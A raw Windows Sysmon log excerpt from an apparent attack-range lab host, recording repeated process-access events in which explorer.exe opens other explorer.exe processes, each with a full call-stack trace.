22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696606Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696605Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696604Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696603Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696602Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696601Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696600Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696599Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696598Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696597Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696596Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696595Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696594Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696593Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696592Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696591Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696590Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696589Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696588Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696587Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696586Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 